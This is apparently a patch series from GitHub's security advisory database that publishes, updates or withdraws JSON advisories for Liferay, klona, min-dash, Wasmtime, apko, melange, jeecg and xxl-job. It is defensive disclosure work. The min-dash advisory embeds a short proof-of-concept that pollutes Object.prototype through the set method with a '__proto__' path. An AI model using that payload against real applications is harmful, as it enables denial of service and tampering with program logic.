"CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.0.3-GA4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay:com.liferay.login.authentication.openid.connect.web" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.0.1" + } + ] + } + ], + "versions": [ + "1.0.0" + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay:com.liferay.login.web" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.20" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12646" + }, + { + "type": "WEB", + "url": "https://github.com/brianchandotcom/liferay-portal/pull/49833" + }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/commit/5549148045125f000d968132235db5b1c2c18b60" + }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/commit/79bffe0f2e74daef88ed9775e92bdfa2d56add93" + }, + { + "type": "WEB", + "url": "https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-70/-/asset_publisher/cjE0ourZXJZE/content/cst-7017-multiple-xss-vulnerabilities" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-18T19:40:46Z", + "nvd_published_at": "2017-08-07T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-8gqf-26xw-x3gx/GHSA-8gqf-26xw-x3gx.json b/advisories/unreviewed/2022/05/GHSA-8gqf-26xw-x3gx/GHSA-8gqf-26xw-x3gx.json deleted file mode 100644 index 1501b50e9a816..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-8gqf-26xw-x3gx/GHSA-8gqf-26xw-x3gx.json +++ /dev/null @@ -1,40 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-8gqf-26xw-x3gx", - "modified": "2022-05-17T02:15:41Z", - "published": "2022-05-17T02:15:41Z", - "aliases": [ - "CVE-2017-12646" - ], - "details": "XSS exists in Liferay Portal before 7.0 CE GA4 via a login name, password, or e-mail address.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12646" - }, - { - "type": "WEB", - "url": "https://github.com/brianchandotcom/liferay-portal/pull/49833" - }, - { - "type": "WEB", - "url": "https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-70/-/asset_publisher/cjE0ourZXJZE/content/cst-7017-multiple-xss-vulnerabilities" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-08-07T16:29:00Z" - } -} \ No newline at end of file From 1320ce31fda9319628b87572a8532f9231b27755 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 19:46:10 +0000 Subject: [PATCH 013/323] Publish Advisories GHSA-4r97-78gf-q24v GHSA-fm93-fhh2-cg2c --- .../09/GHSA-4r97-78gf-q24v/GHSA-4r97-78gf-q24v.json | 7 ++++--- .../01/GHSA-fm93-fhh2-cg2c/GHSA-fm93-fhh2-cg2c.json | 11 +++++------ 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/advisories/github-reviewed/2020/09/GHSA-4r97-78gf-q24v/GHSA-4r97-78gf-q24v.json b/advisories/github-reviewed/2020/09/GHSA-4r97-78gf-q24v/GHSA-4r97-78gf-q24v.json index 430898db44503..855464b6aaf4b 100644 --- a/advisories/github-reviewed/2020/09/GHSA-4r97-78gf-q24v/GHSA-4r97-78gf-q24v.json +++ b/advisories/github-reviewed/2020/09/GHSA-4r97-78gf-q24v/GHSA-4r97-78gf-q24v.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-4r97-78gf-q24v", - "modified": "2020-08-31T19:00:12Z", + "modified": "2025-07-18T19:42:53Z", "published": "2020-09-04T17:53:27Z", + "withdrawn": "2025-07-18T19:42:53Z", "aliases": [], - "summary": "Prototype Pollution in klona", - "details": "Versions of `klona` prior to 1.1.1 are vulnerable to prototype pollution. The package does not restrict the modification of an Object's prototype when cloning objects, which may allow an attacker to add or modify an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nUpgrade to version 1.1.1 or later.", + "summary": "Duplicate Advisory: Prototype Pollution in klona", + "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-8f89-2fwj-5v5r. This link is maintained to preserve external references.\n\n## Original Description\nVersions of `klona` prior to 1.1.1 are vulnerable to prototype pollution. The package does not restrict the modification of an Object's prototype when cloning objects, which may allow an attacker to add or modify an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nUpgrade to version 1.1.1 or later.", "severity": [], "affected": [ { diff --git a/advisories/github-reviewed/2022/01/GHSA-fm93-fhh2-cg2c/GHSA-fm93-fhh2-cg2c.json b/advisories/github-reviewed/2022/01/GHSA-fm93-fhh2-cg2c/GHSA-fm93-fhh2-cg2c.json index ec58f1c5ebc32..50370cc907bdc 100644 --- a/advisories/github-reviewed/2022/01/GHSA-fm93-fhh2-cg2c/GHSA-fm93-fhh2-cg2c.json +++ b/advisories/github-reviewed/2022/01/GHSA-fm93-fhh2-cg2c/GHSA-fm93-fhh2-cg2c.json @@ -1,13 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-fm93-fhh2-cg2c", - "modified": "2022-01-27T14:11:41Z", + "modified": "2025-07-18T19:44:32Z", "published": "2022-01-27T14:21:53Z", - "aliases": [ - "CVE-2021-23460" - ], - "summary": "Prototype Pollution in min-dash", - "details": "The package min-dash before 3.8.1 are vulnerable to Prototype Pollution via the set method due to missing enforcement of key types.", + "withdrawn": "2025-07-18T19:44:32Z", + "aliases": [], + "summary": "Duplicate Advisory: Prototype Pollution in min-dash", + "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-2m53-83f3-562j. This link is maintained to preserve external references.\n\n## Original Description\nThe package min-dash before 3.8.1 are vulnerable to Prototype Pollution via the set method due to missing enforcement of key types.", "severity": [ { "type": "CVSS_V3", From 765843d86917d32fc44587cc967bb5503eebd7cc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 19:52:42 +0000 Subject: [PATCH 014/323] Publish GHSA-fm79-3f68-h2fc --- .../GHSA-fm79-3f68-h2fc.json | 131 ++++++++++++++++++ 1 file changed, 131 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-fm79-3f68-h2fc/GHSA-fm79-3f68-h2fc.json diff --git a/advisories/github-reviewed/2025/07/GHSA-fm79-3f68-h2fc/GHSA-fm79-3f68-h2fc.json b/advisories/github-reviewed/2025/07/GHSA-fm79-3f68-h2fc/GHSA-fm79-3f68-h2fc.json new file mode 100644 index 0000000000000..2cb0747ab7b29 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-fm79-3f68-h2fc/GHSA-fm79-3f68-h2fc.json @@ -0,0 +1,131 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fm79-3f68-h2fc", + "modified": "2025-07-18T19:50:59Z", + "published": "2025-07-18T19:50:58Z", + "aliases": [ + "CVE-2025-53901" + ], + "summary": "Wasmtime CLI is vulnerable to host panic through its fd_renumber function", + "details": "### Summary\n\nA bug in Wasmtime's implementation of the WASIp1 set of import functions can lead to a WebAssembly guest inducing a panic in the host (embedder).\nThe specific bug is triggered by calling `path_open` after calling `fd_renumber` with either:\n- two equal argument values\n- second argument being equal to a previously-closed file descriptor number value\n\nThe corrupt state introduced in `fd_renumber` will lead to the subsequent opening of a file descriptor to panic. This panic cannot introduce memory unsafety or allow WebAssembly to break outside of its sandbox, however. There is no possible heap corruption or memory unsafety from this panic.\n\nThis bug is in the implementation of Wasmtime's `wasmtime-wasi` crate which provides an implementation of WASIp1. The bug requires a specially crafted call to `fd_renumber` in addition to the ability to open a subsequent file descriptor. Opening a second file descriptor is only possible when a preopened directory was provided to the guest, and this is common amongst embeddings. A panic in the host is considered a denial-of-service vector for WebAssembly embedders and is thus a security issue in Wasmtime.\n\nThis bug does not affect WASIp2 and embedders using components.\n\n### Patches\n\nIn accordance with Wasmtime's [release process](https://docs.wasmtime.dev/stability-release.html) patch releases are available as 24.0.4, 33.0.2, and 34.0.2. Users of other release of Wasmtime are recommended to move to a supported release of Wasmtime.\n\n### Workarounds\n\nEmbedders who are using components or are not providing guest access to create more file descriptors (e.g. via a preopened filesystem directory) are not affected by this issue. Otherwise there is no workaround at this time and affected embeddings are recommended to update to a patched version which will not cause a panic in the host.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "wasmtime-wasi" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "24.0.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "wasmtime-wasi" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "25.0.0" + }, + { + "fixed": "33.0.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "wasmtime-wasi" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "34.0.0" + }, + { + "fixed": "34.0.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-fm79-3f68-h2fc" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53901" + }, + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/pull/11277" + }, + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/pull/11278" + }, + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/pull/11279" + }, + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/pull/11281" + }, + { + "type": "WEB", + "url": "https://docs.wasmtime.dev/security-what-is-considered-a-security-vulnerability.html" + }, + { + "type": "WEB", + "url": "https://docs.wasmtime.dev/stability-release.html" + }, + { + "type": "WEB", + "url": "https://github.com/WebAssembly/WASI/blob/e1aa1cae4dda4c1f70f23fe11e922aae92f240a8/legacy/preview1/witx/wasi_snapshot_preview1.witx#L245-L260" + }, + { + "type": "PACKAGE", + "url": "https://github.com/bytecodealliance/wasmtime" + }, + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/blob/037a6edadbc225decbea00a551aabf04203717d9/crates/wasi/src/preview1.rs#L1824-L1836" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-672" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2025-07-18T19:50:58Z", + "nvd_published_at": "2025-07-18T18:15:24Z" + } +} \ No newline at end of file From b72f988f65e1fab3ba631f3bfcf56a134d70a520 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 20:01:34 +0000 Subject: [PATCH 015/323] Publish GHSA-2m53-83f3-562j --- .../GHSA-2m53-83f3-562j.json | 60 +++++++++++++++++-- 1 file changed, 55 insertions(+), 5 deletions(-) diff --git a/advisories/github-reviewed/2022/02/GHSA-2m53-83f3-562j/GHSA-2m53-83f3-562j.json b/advisories/github-reviewed/2022/02/GHSA-2m53-83f3-562j/GHSA-2m53-83f3-562j.json index 77dcff7c0e99d..0ac099602130a 100644 --- a/advisories/github-reviewed/2022/02/GHSA-2m53-83f3-562j/GHSA-2m53-83f3-562j.json +++ b/advisories/github-reviewed/2022/02/GHSA-2m53-83f3-562j/GHSA-2m53-83f3-562j.json @@ -1,12 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-2m53-83f3-562j", - "modified": "2022-01-27T23:11:40Z", + "modified": "2025-07-18T19:59:29Z", "published": "2022-02-01T00:44:35Z", - "aliases": [], - "summary": "Prototype pollution in min-dash < 3.8.1", - "details": "### Impact\n\nThe `set` method is vulnerable to prototype pollution with specially crafted inputs.\n\n```javascript\n// insert the following into poc.js and run node poc,js (after installing the package)\n \nlet parser = require(\"min-dash\");\nparser.set({}, [[\"__proto__\"], \"polluted\"], \"success\");\nconsole.log(polluted);\n```\n\n### Patches\n\n`min-dash>=3.8.1` fix the issue.\n\n### Workarounds\n\nNo workarounds exist for the issue.\n\n### References\n\nClosed via https://github.com/bpmn-io/min-dash/pull/21.\n\n### Credits\n\nCredits to Cristian-Alexandru STAICU who found the vulnerability and to Idan Digmi from the Snyk Security Team who reported the vulnerability to us, responsibly. ", - "severity": [], + "aliases": [ + "CVE-2021-23460" + ], + "summary": "Prototype pollution in min-dash", + "details": "### Impact\n\nThe `set` method is vulnerable to prototype pollution with specially crafted inputs.\n\n```javascript\n// insert the following into poc.js and run node poc,js (after installing the package)\n \nlet parser = require(\"min-dash\");\nparser.set({}, [[\"__proto__\"], \"polluted\"], \"success\");\nconsole.log(polluted);\n```\n\n### Patches\n\n`min-dash>=3.8.1` fix the issue.\n\n### Workarounds\n\nNo workarounds exist for the issue.\n\n### References\n\nClosed via https://github.com/bpmn-io/min-dash/pull/21.\n\n### Credits\n\nCredits to Cristian-Alexandru STAICU who found the vulnerability and to Idan Digmi from the Snyk Security Team who reported the vulnerability to us, responsibly.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [ { "package": { @@ -26,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.webjars.npm:min-dash" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.8.1" + } + ] + } + ] } ], "references": [ @@ -33,9 +59,33 @@ "type": "WEB", "url": "https://github.com/bpmn-io/min-dash/security/advisories/GHSA-2m53-83f3-562j" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23460" + }, + { + "type": "WEB", + "url": "https://github.com/bpmn-io/min-dash/pull/21" + }, + { + "type": "WEB", + "url": "https://github.com/bpmn-io/min-dash/commit/2c6689e2aa29f4b66a4874a2f3003431e9db48d1" + }, { "type": "PACKAGE", "url": "https://github.com/bpmn-io/min-dash" + }, + { + "type": "WEB", + "url": "https://github.com/bpmn-io/min-dash/blob/c4d579c0eb2ed0739592111c3906b198921d3f52/lib/object.js#L32" + }, + { + "type": "WEB", + "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2342127" + }, + { + "type": "WEB", + "url": "https://snyk.io/vuln/SNYK-JS-MINDASH-2340605" } ], "database_specific": { From 2770397e37cb432597435799b35f985d4c356866 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 20:05:32 +0000 Subject: [PATCH 016/323] Publish GHSA-x6ph-r535-3vjw --- .../GHSA-x6ph-r535-3vjw.json | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-x6ph-r535-3vjw/GHSA-x6ph-r535-3vjw.json diff --git a/advisories/github-reviewed/2025/07/GHSA-x6ph-r535-3vjw/GHSA-x6ph-r535-3vjw.json b/advisories/github-reviewed/2025/07/GHSA-x6ph-r535-3vjw/GHSA-x6ph-r535-3vjw.json new file mode 100644 index 0000000000000..4022859e1c46b --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-x6ph-r535-3vjw/GHSA-x6ph-r535-3vjw.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6ph-r535-3vjw", + "modified": "2025-07-18T20:03:25Z", + "published": "2025-07-18T20:03:25Z", + "aliases": [ + "CVE-2025-53945" + ], + "summary": "apko is vulnerable to attack through incorrect permissions in /etc/ld.so.cache and other files", + "details": "It was discovered that the ld.so.cache in images generated by apko had file system permissions mode `0666`:\n```\nbash-5.3# find / -type f -perm -o+w\n/etc/ld.so.cache\n```\n\nThis issue was introduced in commit [04f37e2 (\"generate /etc/ld.so.cache (#1629)\")](https://github.com/chainguard-dev/apko/commit/04f37e2d50d5a502e155788561fb7d40de705bd9)([v0.27.0](https://github.com/chainguard-dev/apko/releases/tag/v0.27.0)).\n\n### Impact\nThis potentially allows a local unprivileged user to add additional additional directories including dynamic libraries to the dynamic loader path. A user could exploit this by placing a malicious library in a directory they control.\n\n### Patches\nThis issue was addressed in apko in [aedb077 (\"fix: /etc/ld.so.cache file permissions (#1758)\")](https://github.com/chainguard-dev/apko/commit/aedb0772d6bf6e74d8f17690946dbc791d0f6af3) ([v0.29.5](https://github.com/chainguard-dev/apko/releases/tag/v0.29.5)).\n\n### Acknowledgements\n\nMany thanks to Cody Harris from [H2O.ai](http://h2o.ai/) for reporting this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "chainguard.dev/apko" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.27.0" + }, + { + "fixed": "0.29.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/chainguard-dev/apko/security/advisories/GHSA-x6ph-r535-3vjw" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53945" + }, + { + "type": "WEB", + "url": "https://github.com/chainguard-dev/apko/commit/04f37e2d50d5a502e155788561fb7d40de705bd9" + }, + { + "type": "WEB", + "url": "https://github.com/chainguard-dev/apko/commit/aedb0772d6bf6e74d8f17690946dbc791d0f6af3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/chainguard-dev/apko" + }, + { + "type": "WEB", + "url": "https://github.com/chainguard-dev/apko/releases/tag/v0.29.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-07-18T20:03:25Z", + "nvd_published_at": "2025-07-18T16:15:30Z" + } +} \ No newline at end of file From 37f79bbbd869c7b3656cd43470d107f2dd7060cf Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 20:15:01 +0000 Subject: [PATCH 017/323] Publish Advisories GHSA-25gv-mvm7-5h3h GHSA-5662-cv6m-63wh --- .../GHSA-25gv-mvm7-5h3h.json | 4 +- .../GHSA-5662-cv6m-63wh.json | 81 +++++++++++++++++++ 2 files changed, 83 insertions(+), 2 deletions(-) create mode 100644 advisories/github-reviewed/2025/07/GHSA-5662-cv6m-63wh/GHSA-5662-cv6m-63wh.json diff --git a/advisories/github-reviewed/2022/11/GHSA-25gv-mvm7-5h3h/GHSA-25gv-mvm7-5h3h.json b/advisories/github-reviewed/2022/11/GHSA-25gv-mvm7-5h3h/GHSA-25gv-mvm7-5h3h.json index 10546a7d0fa15..10327417e134c 100644 --- a/advisories/github-reviewed/2022/11/GHSA-25gv-mvm7-5h3h/GHSA-25gv-mvm7-5h3h.json +++ b/advisories/github-reviewed/2022/11/GHSA-25gv-mvm7-5h3h/GHSA-25gv-mvm7-5h3h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-25gv-mvm7-5h3h", - "modified": "2025-04-29T15:37:21Z", + "modified": "2025-07-18T20:13:40Z", "published": "2022-11-25T18:30:25Z", "aliases": [ "CVE-2022-45208" @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.jeecgframework.boot:jeecg-boot-common" + "name": "org.jeecgframework.boot:jeecg-module-system" }, "ranges": [ { diff --git a/advisories/github-reviewed/2025/07/GHSA-5662-cv6m-63wh/GHSA-5662-cv6m-63wh.json b/advisories/github-reviewed/2025/07/GHSA-5662-cv6m-63wh/GHSA-5662-cv6m-63wh.json new file mode 100644 index 0000000000000..b96e0a3065548 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-5662-cv6m-63wh/GHSA-5662-cv6m-63wh.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5662-cv6m-63wh", + "modified": "2025-07-18T20:13:21Z", + "published": "2025-07-18T20:13:21Z", + "aliases": [ + "CVE-2025-54059" + ], + "summary": "melange's world-writable permissions expose SBOM files to potential image tampering", + "details": "It was discovered that the SBOM files generated by melange in apks had file system permissions mode 666:\n```\n$ apkrane ls https://packages.wolfi.dev/os/x86_64/APKINDEX.tar.gz -P hello-wolfi --full --latest | xargs wget -q -O - | tar tzv 2>/dev/null var/lib/db/sbom\ndrwxr-xr-x root/root 0 2025-06-23 14:17 var/lib/db/sbom\n-rw-rw-rw- root/root 3383 2025-06-23 14:17 var/lib/db/sbom/hello-wolfi-2.12.2-r1.spdx.json\n```\n\nThis issue was introduced in commit 1b272db (\"Persist workspace filesystem throughout package builds (#1836)\") ([v0.23.0](https://github.com/chainguard-dev/melange/releases/tag/v0.23.0)).\n\n### Impact\nThis potentially allows an unprivileged user to tamper with apk SBOMs on a running image, potentially confusing security scanners. An attacker could also perform a DoS under special circumstances.\n\n### Patches\nThis issue was addressed in melange in e29494b (\"fix: tighten up permissions for written SBOM files and signature tarballs (#2086)\") ([v0.29.5](https://github.com/chainguard-dev/melange/releases/tag/v0.29.5)).\n\n## Acknowledgements\n\nThanks to Cody Harris [H2O.ai](https://h2o.ai/) and Markus Boehme for independently reporting this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "chainguard.dev/melange" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.23.0" + }, + { + "fixed": "0.29.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/chainguard-dev/melange/security/advisories/GHSA-5662-cv6m-63wh" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54059" + }, + { + "type": "WEB", + "url": "https://github.com/chainguard-dev/melange/pull/1836" + }, + { + "type": "WEB", + "url": "https://github.com/chainguard-dev/melange/pull/2086" + }, + { + "type": "WEB", + "url": "https://github.com/chainguard-dev/melange/commit/1b272db2a0bb3441553284cc56d87236b4b64c04" + }, + { + "type": "WEB", + "url": "https://github.com/chainguard-dev/melange/commit/e29494b4a40a91619ec1c87a09003c6d5164cea1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/chainguard-dev/melange" + }, + { + "type": "WEB", + "url": "https://github.com/chainguard-dev/melange/releases/tag/v0.29.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-18T20:13:21Z", + "nvd_published_at": "2025-07-18T16:15:30Z" + } +} \ No newline at end of file From e9daa835b1ca04d5f3b7ab6de5eef173d6ae16e0 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 20:17:43 +0000 Subject: [PATCH 018/323] Publish GHSA-4j2x-v3mr-467m --- .../2022/11/GHSA-4j2x-v3mr-467m/GHSA-4j2x-v3mr-467m.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2022/11/GHSA-4j2x-v3mr-467m/GHSA-4j2x-v3mr-467m.json b/advisories/github-reviewed/2022/11/GHSA-4j2x-v3mr-467m/GHSA-4j2x-v3mr-467m.json index 53c0bc972b685..6ed20ae540de9 100644 --- a/advisories/github-reviewed/2022/11/GHSA-4j2x-v3mr-467m/GHSA-4j2x-v3mr-467m.json +++ b/advisories/github-reviewed/2022/11/GHSA-4j2x-v3mr-467m/GHSA-4j2x-v3mr-467m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4j2x-v3mr-467m", - "modified": "2025-04-29T15:37:17Z", + "modified": "2025-07-18T20:16:15Z", "published": "2022-11-25T18:30:25Z", "aliases": [ "CVE-2022-45207" @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.jeecgframework.boot:jeecg-boot-common" + "name": "org.jeecgframework.boot:jeecg-module-system" }, "ranges": [ { From 8824adf184c2e0298ea07eb5d32ac3157f97d650 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 20:19:37 +0000 Subject: [PATCH 019/323] Publish Advisories GHSA-g5cj-5h58-j93w GHSA-v87q-rpwp-qr7q --- .../2022/11/GHSA-g5cj-5h58-j93w/GHSA-g5cj-5h58-j93w.json | 4 ++-- .../2022/11/GHSA-v87q-rpwp-qr7q/GHSA-v87q-rpwp-qr7q.json | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2022/11/GHSA-g5cj-5h58-j93w/GHSA-g5cj-5h58-j93w.json b/advisories/github-reviewed/2022/11/GHSA-g5cj-5h58-j93w/GHSA-g5cj-5h58-j93w.json index 7cd64e9ec6519..6814221c202f9 100644 --- a/advisories/github-reviewed/2022/11/GHSA-g5cj-5h58-j93w/GHSA-g5cj-5h58-j93w.json +++ b/advisories/github-reviewed/2022/11/GHSA-g5cj-5h58-j93w/GHSA-g5cj-5h58-j93w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g5cj-5h58-j93w", - "modified": "2025-04-29T15:37:28Z", + "modified": "2025-07-18T20:19:12Z", "published": "2022-11-25T18:30:25Z", "aliases": [ "CVE-2022-45206" @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.jeecgframework.boot:jeecg-boot-common" + "name": "org.jeecgframework.boot:jeecg-module-system" }, "ranges": [ { diff --git a/advisories/github-reviewed/2022/11/GHSA-v87q-rpwp-qr7q/GHSA-v87q-rpwp-qr7q.json b/advisories/github-reviewed/2022/11/GHSA-v87q-rpwp-qr7q/GHSA-v87q-rpwp-qr7q.json index e85ebb17ca7ed..2d1b1a0647392 100644 --- a/advisories/github-reviewed/2022/11/GHSA-v87q-rpwp-qr7q/GHSA-v87q-rpwp-qr7q.json +++ b/advisories/github-reviewed/2022/11/GHSA-v87q-rpwp-qr7q/GHSA-v87q-rpwp-qr7q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v87q-rpwp-qr7q", - "modified": "2025-04-29T15:40:04Z", + "modified": "2025-07-18T20:18:02Z", "published": "2022-11-25T18:30:25Z", "aliases": [ "CVE-2022-45210" @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.jeecgframework.boot:jeecg-boot-common" + "name": "org.jeecgframework.boot:jeecg-module-system" }, "ranges": [ { From 3f1eb6d24b4c4b84074273ef9c8d33d6cd7bfb90 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 20:37:23 +0000 Subject: [PATCH 020/323] Publish GHSA-c352-x843-ggpq --- .../2024/02/GHSA-c352-x843-ggpq/GHSA-c352-x843-ggpq.json | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2024/02/GHSA-c352-x843-ggpq/GHSA-c352-x843-ggpq.json b/advisories/github-reviewed/2024/02/GHSA-c352-x843-ggpq/GHSA-c352-x843-ggpq.json index fe6f6f7ea6b76..69e39f68ad65b 100644 --- a/advisories/github-reviewed/2024/02/GHSA-c352-x843-ggpq/GHSA-c352-x843-ggpq.json +++ b/advisories/github-reviewed/2024/02/GHSA-c352-x843-ggpq/GHSA-c352-x843-ggpq.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-c352-x843-ggpq", - "modified": "2025-05-16T02:11:38Z", + "modified": "2025-07-18T20:35:46Z", "published": "2024-02-08T15:30:27Z", "aliases": [ "CVE-2024-24113" ], "summary": "XXL-JOB vulnerable to Server-Side Request Forgery", - "details": "xxl-job <= 2.4.0 has a Server-Side Request Forgery (SSRF) vulnerability, which causes low-privileged users to control executor to RCE.", + "details": "xxl-job <= 2.4.2 has a Server-Side Request Forgery (SSRF) vulnerability, which causes low-privileged users to control executor to RCE.", "severity": [ { "type": "CVSS_V3", @@ -28,7 +28,7 @@ "introduced": "0" }, { - "last_affected": "2.4.0" + "last_affected": "2.4.2" } ] } From c09dcbef2f8b6a4e7fcad61f7d9793c71df50c2c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 20:41:12 +0000 